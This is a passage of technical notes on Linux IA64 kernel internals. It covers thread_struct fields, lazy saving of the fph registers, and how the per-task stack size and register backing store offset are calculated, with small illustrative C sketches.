    __u64 old_k1;               /* old value of ar.k1 */
    __u64 old_iob;              /* old IOBase value */
    struct ia64_partial_page_list *ppl; /* partial page list for 4K page size issue */
    /* cached TLS descriptors. */
    struct desc_struct tls_array[GDT_ENTRY_TLS_ENTRIES];

# define INIT_THREAD_IA32   .eflag = 0, \
                            .fsr = 0, \
                            .fcr = 0x17800000037fULL, \
                            .fir = 0, \
                            .fdr = 0, \
                            .old_k1 = 0, \
                            .old_iob = 0, \
                            .ppl = NULL,
#else
# define INIT_THREAD_IA32
#endif /* CONFIG_IA32_SUPPORT */
#ifdef CONFIG_PERFMON
    void *pfm_context;                  /* pointer to detailed PMU context */
    unsigned long pfm_needs_checking;   /* when >0, pending perfmon work on kernel exit */
# define INIT_THREAD_PM     .pfm_context = NULL, \
                            .pfm_needs_checking = 0UL,
#else
# define INIT_THREAD_PM
#endif
    __u64 dbr[IA64_NUM_DBG_REGS];
    __u64 ibr[IA64_NUM_DBG_REGS];
    struct ia64_fpreg fph[96];  /* saved/loaded on demand */
};

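The idea of lazily managed state (for example the fph array, which the struct comments as "saved/loaded on demand") can be modelled in plain user-space C. The sketch below is only an illustration of the principle, not the kernel's implementation: struct cpu, struct task, context_switch() and touch_fph() are hypothetical names, and the real kernel detects the first use of the registers through hardware mechanisms rather than an explicit call.

```c
#include <string.h>

#define NUM_FPH 96                  /* same count as fph[96] in thread_struct */

struct task {                       /* hypothetical, far smaller than task_struct */
    double saved_fph[NUM_FPH];      /* plays the role of thread_struct.fph */
};

struct cpu {                        /* hypothetical model of a single CPU */
    struct task *current;           /* task currently running */
    struct task *fph_owner;         /* task whose values are live in fph[] */
    double fph[NUM_FPH];            /* stands in for registers f32-f127 */
    int lazy_switches;              /* how often the large state was copied */
};

/* Context switch: the lazily managed state is deliberately left alone. */
void context_switch(struct cpu *cpu, struct task *next)
{
    cpu->current = next;            /* eager state would be saved/restored here */
}

/* Called when the current task actually needs the lazily managed registers. */
void touch_fph(struct cpu *cpu)
{
    struct task *t = cpu->current;

    if (cpu->fph_owner == t)
        return;                     /* registers already hold this task's values */
    if (cpu->fph_owner)             /* save the previous owner's values first */
        memcpy(cpu->fph_owner->saved_fph, cpu->fph, sizeof cpu->fph);
    memcpy(cpu->fph, t->saved_fph, sizeof cpu->fph);
    cpu->fph_owner = t;
    cpu->lazy_switches++;
}
```

If task A uses the registers, is switched out, and is switched back in before any other task touches them, no copy takes place; the 96-register copy happens only when a different task really needs the registers.
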
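After a task is created, one large block of memory is allocated for it and managed through its task_struct. The figure below shows how this block is used:

See Figure 3:

{{./3.jpg}}

On IA64, Linux defines the size of the memory region allocated to each task as IA64_STK_OFFSET:
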
#define IA64_STK_OFFSET ((1 << KERNEL_STACK_SIZE_ORDER)*PAGE_SIZE)

#if defined(CONFIG_IA64_PAGE_SIZE_4KB)
# define KERNEL_STACK_SIZE_ORDER 3
#elif defined(CONFIG_IA64_PAGE_SIZE_8KB)
# define KERNEL_STACK_SIZE_ORDER 2
#elif defined(CONFIG_IA64_PAGE_SIZE_16KB)
# define KERNEL_STACK_SIZE_ORDER 1
#else
# define KERNEL_STACK_SIZE_ORDER 0
#endif

These definitions fix IA64_STK_OFFSET and therefore the size of the allocation:
If PAGE_SIZE = 4KB, IA64_STK_OFFSET is 8 * 4KB = 32KB;
if PAGE_SIZE = 8KB, IA64_STK_OFFSET is 4 * 8KB = 32KB;
if PAGE_SIZE = 16KB, IA64_STK_OFFSET is 2 * 16KB = 32KB;
if PAGE_SIZE = 64KB (the #else branch), IA64_STK_OFFSET is 1 * 64KB = 64KB.

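The arithmetic above can be checked with a few lines of C. This is a minimal sketch: stack_size_order() and stk_offset_kb() are hypothetical helpers that take the page size as a runtime parameter so that all configurations can be compared side by side, whereas the kernel selects the order at compile time through the preprocessor.

```c
/* Mirrors the KERNEL_STACK_SIZE_ORDER selection; page size is given in KB. */
unsigned int stack_size_order(unsigned int page_size_kb)
{
    switch (page_size_kb) {
    case 4:  return 3;
    case 8:  return 2;
    case 16: return 1;
    default: return 0;      /* the #else branch, e.g. 64KB pages */
    }
}

/* IA64_STK_OFFSET in KB: (1 << KERNEL_STACK_SIZE_ORDER) * PAGE_SIZE */
unsigned int stk_offset_kb(unsigned int page_size_kb)
{
    return (1u << stack_size_order(page_size_kb)) * page_size_kb;
}
```

Calling stk_offset_kb() with 4, 8 and 16 gives 32 in each case, and 64 for 64KB pages, which matches the values listed above: the per-task block is 32KB unless a single page is already larger than that.
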
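The figure above also shows a variable IA64_RBS_BASE (the kernel source below names it IA64_RBS_OFFSET). What does it describe? I find it hard to put into words, so the Linux definition can speak for itself: it is the combined size of task_struct and thread_info, rounded up to a multiple of 32 bytes, which is the offset within the block at which the RBS (register backing store) begins.
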
#define IA64_RBS_OFFSET ((IA64_TASK_SIZE + IA64_THREAD_INFO_SIZE + 31) & ~31)

DEFINE(IA64_TASK_SIZE, sizeof (struct task_struct));
DEFINE(IA64_THREAD_INFO_SIZE, sizeof (struct thread_info));

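The expression (x + 31) & ~31 in IA64_RBS_OFFSET rounds x up to the next multiple of 32. The sketch below reproduces that calculation; round_up_32() and rbs_offset() are hypothetical helper names, and the sizes passed in are made-up numbers, not the real sizes of task_struct or thread_info.

```c
#include <stddef.h>

/* Round size up to the next multiple of 32, as IA64_RBS_OFFSET does. */
size_t round_up_32(size_t size)
{
    return (size + 31) & ~(size_t)31;
}

/* Offset of the RBS from the start of the task's memory block. */
size_t rbs_offset(size_t task_size, size_t thread_info_size)
{
    return round_up_32(task_size + thread_info_size);
}
```

For example, with an assumed task_struct size of 1000 bytes and an assumed thread_info size of 100 bytes, the sum is 1100 and rbs_offset() returns 1120, the next multiple of 32. A sum that is already 32-byte aligned is returned unchanged.
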
BIN
Zim/Programme/APUE/进程和线程/1.jpg
Normal file
|
After Width: | Height: | Size: 11 KiB |